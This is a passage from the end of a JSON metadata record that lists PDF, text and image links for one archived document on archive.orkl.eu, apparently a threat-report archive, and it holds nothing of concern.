		"pdf": "https://archive.orkl.eu/a71c007f20d98d8724bb35a58f935d7cb35409af.pdf",
		"text": "https://archive.orkl.eu/a71c007f20d98d8724bb35a58f935d7cb35409af.txt",
		"img": "https://archive.orkl.eu/a71c007f20d98d8724bb35a58f935d7cb35409af.jpg"
	}
}